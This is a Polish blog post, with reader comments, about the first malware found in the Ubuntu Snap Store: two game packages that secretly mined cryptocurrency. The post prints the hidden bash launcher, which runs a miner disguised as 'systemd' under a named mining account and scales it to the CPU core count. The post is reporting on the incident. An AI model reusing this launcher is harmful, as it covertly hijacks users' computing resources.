przystajnik

Syndrom sukcesu, czyli pierwsze malware w Ubuntu Snap Store

Ubuntu Snap Store odnotował właśnie pierwszy sukces w postaci nawiązania do osiągnięć wielkich konkurentów i ich sklepów z oprogramowaniem. Społeczność nie doceniła tego doniosłego faktu. Sprawa została zgłoszona jako błąd #651 a programy których dotyczyło zgłoszenie zostały usunięte. Użytkowniku Ubuntu – zacznij się oswajać z trwogą przed malware.

Unikajcie ofert od Nicolasa Tomba

Sklep Ubuntu z paczkami Snap miał przybliżyć milionom użytkowników ogrom oprogramowania linuksowego, jak też stworzyć okazję deweloperom do łatwego podzielenia się efektami swojej pracy. Jednak zasady tej współpracy zostały podparte zbyt liberalnym optymizmem.

Jak można przeczytać w doniesieniu #651, użytkownicy odkryli że co najmniej dwa programy oferowane w ramach sklepu z paczkami Snap zawierają malware. Chodzi o 2048buntu oraz Hextris, które opublikował w Ubuntu Snaps Store „zaradny” Nicolas Tomb. Programy zawierały skrypty uruchamiające na komputera nieświadomych użytkowników kopalnię bitcoinów.

Wartym odnotowania jest również fakt, że większości swoich snapów Nicolas określił jako oprogramowanie własnościowe, za pomocą stosownej licencji. Najwidoczniej autor nie czuje się związany ze społecznością i nie zamierza dzielić z nią ani swoich kodów źródłowych ani zapewne przyszłych dochodów wypracowanych przez jego skrypty.

Wgląd w dodatki instalowane przez te paczki nie pozostawia złudzeń:

#!/bin/bash

currency=bcn
name=2048buntu

{ # try
/snap/$name/current/systemd -u myfirstferrari@protonmail.com --$currency 1 -g
} || { # catch
cores=($(grep -c ^processor /proc/cpuinfo))

if (( $cores < 4 )); then
    /snap/$name/current/systemd -u myfirstferrari@protonmail.com --$currency 1
else
    /snap/$name/current/systemd -u myfirstferrari@protonmail.com --$currency 2
fi
}

Jak do tego doszło? Cóż, nieustanne zarzuty wobec ludzi odpowiedzialnych za sklep Ubuntu doprowadziły do tego, że uproszczono zasadę publikowania paczek Snap. Nie ma tu takiego sita jak w przypadku paczek .deb które trafiają do oficjalnego repozytorium. Pojawienie się malware (i w przyszłości zapewne innych) to była kwestia czasu.

Obydwie paczki (jak i inne osiągnięcia Nicolasa) zostały już usunięte z Ubuntu Snap Store. Przypuszczalnie jednak mogą krążyć jeszcze gdzieś po internecie (Google Cache? Github?).

Czy stoimy właśnie u progu nowej linuksowej jakości? 

Post navigation

13 comments for “Syndrom sukcesu, czyli pierwsze malware w Ubuntu Snap Store

  1. adamserce
    13 maja, 2018 at 1:10

    Znalazłem literówkę w 3 wierszu tekstu:

    „Użytkowników Ubuntu” zamiast Użytkowniku Ubuntu…

  2. rob
    13 maja, 2018 at 7:02

    Jeśli Ubuntu miałoby zastąpić Windowsy, to jego twórcy dobrze kombinują 😉
    A tak poważnie, to od początku uważałem,że te całe snapy i temu podobne wynalazki to poroniony pomysł.

  3. kolo
    13 maja, 2018 at 7:30

    Nie wiem jak można używać ubuntu. Po tych historiach z amazonem itp dotyczących prywatności to już lepiej mieć windowsa chociaż można pograć jak człowiek, a chcesz linuxa to zainstaluj Debiana lub coś opartego o Red Hat.

  4. Inter
    13 maja, 2018 at 8:36

    Hmmm… prostacka gierka, która ma 138 Mb zamkniętego kodu z zależnościami… śmierdzi na odległość.

  5. icywind
    13 maja, 2018 at 11:30

    A nie jest tak z każdym snapem?

  6. barthalion
    13 maja, 2018 at 14:35

    Google cache? Github? Facebook? Biedronka? Skrzynka pocztowa? Wycieraczka?

  7. Pseudodrummer
    13 maja, 2018 at 16:51

    Kpina?Sarkazm?Dowcip?Kompleks?Złośliwość?Bezradność?

  8. 13 maja, 2018 at 17:07

    Śmiech śmiechem, ale nie wiadomo do czego doklika się zawzięty użytkownik na:

    https://webcache.googleusercontent.com/search?source=hp&ei=BDT3WvTIKaGr6AT295HIDw&q=cache%3Ahttps%3A%2F%2Fsnapcraft.io%2F2048buntu&oq=cache%3Ahttps%3A%2F%2Fsnapcraft.io%2F2048buntu&gs_l=psy-ab.3…5653.7198.0.7376.7.7.0.0.0.0.125.686.4j3.7.0….0…1c.1.64.psy-ab..0.6.614…0j46j0i46k1.0.OioghBze15M

  9. anon231
    13 maja, 2018 at 19:16

    Nie jesteś śmieszny.

  10. 14 maja, 2018 at 7:02

    Plus jest taki, że nawet jak ktoś upchnie malware lub inne „coś” w snapie, to i tak działa sobie w swojej piaskownicy. Problemem jednak może być pasożytowanie na zasobach komputera.

  11. tgi
    16 maja, 2018 at 1:58

    A miał być?

  12. barthalion
    16 maja, 2018 at 18:41

    Z całym szacunkiem, ale takie bicie piany jest naprawdę zbędne. Nie dokilka się niczego, bo tak czy siak musiałby używać snapa (jako polecenie!) lokalnie. Zbędne sianie FUD-u.

  13. kfbz
    17 maja, 2018 at 17:00

    Psułeś pakiety w Archu, że musiałem przenieść się na Funtoo.
    Arch stał się dystrybucją dla gimbazy, aby przechwalać się, że mają najnowsze jądro z całym tym syfem systemd, pulseaudio.

Dodaj komentarz

Twój adres email nie zostanie opublikowany. Pola, których wypełnienie jest wymagane, są oznaczone symbolem *

This site uses Akismet to reduce spam. Learn how your comment data is processed.

Translate »